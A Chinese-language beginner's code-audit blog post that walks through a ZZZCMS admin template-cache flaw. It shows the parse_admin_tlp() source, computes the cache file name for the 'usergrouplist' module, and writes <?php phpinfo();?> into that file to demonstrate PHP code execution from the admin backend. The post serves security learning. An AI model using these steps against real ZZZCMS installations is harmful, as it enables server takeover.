开始学习代码审计了，开始阶段先跟着大佬的脚步走吧

1.先去下载一个zzzcms

官网：http://www.zzzcms.com/index.html

image.png
实在是没找到v1.6.6只能下载一个v1.7.1了

<?php
require '../inc/zzz_admin.php'; 
$getModule=getModule();
$type=getform('type','get');
$folder=getform('folder','get');
$module=!empty($getModule) ? $getModule : 'index';
$GLOBALS['type']=$type;
geturl();
switch ($module) {  
    case 'aboutlist':       
        break;
···
    //echop ($data);die;
    $GLOBALS['r']=isset($data) ? arr_key($data) : '';
    //echop (parse_admin_tlp($module));die;
    include parse_admin_tlp($module);

在后台管理的主界面的中先导入了一个文件 require '../inc/zzz_admin.php';
然后程序最后导入了include parse_admin_tlp($module);
而parse_admin_tlp()函数就是在../inc/zzz_admin.php中
定位到../inc/zzz_amin.php中1992行

function parse_admin_tlp( $module ) {
    $tpltype = G( 'ID' ) ? 'edit' : 'add';
    $tplfile = SITE_DIR . conf( 'adminpath' ) . 'template/' . $module . '.tpl';
    $cachefile = RUN_DIR . 'cache/' . conf( 'adminpath' ) . md5( $module . $tpltype ) . '.tpl';
    //echop ($tplfile);echop ($cachefile);
    //echop( template_parse(load_file($tplfile)));
    if ( !is_file( $cachefile ) || time_file( $tplfile ) > time_file( $cachefile ) || size_file( $tplfile ) == 0 ) {
        create_file( $cachefile, template_parse( load_file( $tplfile ) ) );
    }
    return $cachefile;
}

虽然大佬把代码功能讲的很清楚了,但是作为php小白还是先研究一下,写上注释

//  G() 从全局中寻找'ID' 如果找到直接返回'ID',没找到的话返回$def(默认为NULL)
function G( $k, $def = NULL ) {
    return isset( $GLOBALS[ $k ] ) ? $GLOBALS[ $k ] : $def;
}

function parse_admin_tlp( $module ) {
    $tpltype = G( 'ID' ) ? 'edit' : 'add';
    // 如果G()返回全局变量k(true)就令$tpltype='edit',如果返回NULL(false)就令$tpltype='add'
    // 初步判断ID可能是0或用户名
    $tplfile = SITE_DIR . conf( 'adminpath' ) . 'template/' . $module . '.tpl';
    // 拼接一个$tplfile
    $cachefile = RUN_DIR . 'cache/' . conf( 'adminpath' ) . md5( $module . $tpltype ) . '.tpl';
    // 拼接$cachefile路径
    if ( !is_file( $cachefile ) || time_file( $tplfile ) > time_file( $cachefile ) || size_file( $tplfile ) == 0 ) {
        create_file( $cachefile, template_parse( load_file( $tplfile ) ) );
    }//如果$cachefile不存在 或...则创建$cachefile
    // 否则返回$cachefile
    return $cachefile;
}

而 cachefile 文件内容可以在后台修改，如果其内容修改为任意 php 代码，则会造成任意 php 代码执行。

该请求提交到 /adminxxx/index.php 处理，此时 module 变量的值为 usergrouplist，如果没有相应的缓存文件，在最后一行会生成该文件。

php -r "var_dump(md5('usergrouplistadd'));"
string(32) "f6f373570fe983d7f5ea813871d99f6d"
文件名：f6f373570fe983d7f5ea813871d99f6d.tpl

修改缓存文件内容。
后台 —> 静态缓存 —> 缓存列表 —> 后台缓存 —> 修改 f6f373570fe983d7f5ea813871d99f6d.tpl 文件内容为
<?php phpinfo();?>
访问http://xxxxx/adminxxx/?usergrouplist

但是我下载的1.7.1好像不能这么做了，（我也不知道）

image.png

额，没啥办法只能去文件夹里自己手动改了，

···
</div>
<script src="../plugins/bootstrap/bootstrap.min.js"></script> 
<script src="../plugins/bootstrap-table/bootstrap-table.min.js"></script> 
<script src="../plugins/bootstrap-table/bootstrap-table-mobile.min.js"></script> 
<script src="../plugins/layer/layer.min.js"></script>
<script src="js/adminjs.js"></script>
</body>
</html>
</php phpinfo(); ?>

在文件末尾加个phpinfo()

img

确实是可以进行命令执行的